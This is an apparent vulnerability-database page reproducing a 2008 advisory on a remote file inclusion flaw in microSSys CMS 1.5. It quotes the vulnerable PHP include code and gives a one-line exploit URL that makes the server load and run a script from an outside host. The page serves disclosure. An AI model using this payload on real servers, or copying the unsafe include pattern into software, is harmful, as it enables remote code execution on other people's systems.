Lucene search

microssyscms-rfi.txt

🗓️ 19 May 2008 00:00:00Reported by Raz0rType

packetstorm🔗 packetstormsecurity.com👁 16 Views

microSSys CMS <= 1.5 Remote File Inclusion Vulnerability in http://wajox.com

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`## microSSys CMS <= 1.5 Remote File Inclusion Vulnerability  
## Software site: http://wajox.com/  
## ===============================================================  
## By Raz0r (www.Raz0r.name)  
## ===============================================================  
## Vulnerable code (index.php@22-25,54-55):  
## [22] if(isset($_REQUEST["1"])){  
## [23] $P=$_REQUEST["1"];}else{  
## [24] $P="main";  
## [25] }  
## [..]  
## [54] if(isset($PAGES[$P])){}else{include("TH.txt");}  
## [55] @include($PAGES[$P]);  
## Nice...  
## ===============================================================  
## Exploit:  
## http://host/index.php?1=lol&PAGES[lol]=http://raz0r.name/s.php  
## ===============================================================   
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

19 May 2008 00:00Current

7.4High risk

Vulners AI Score7.4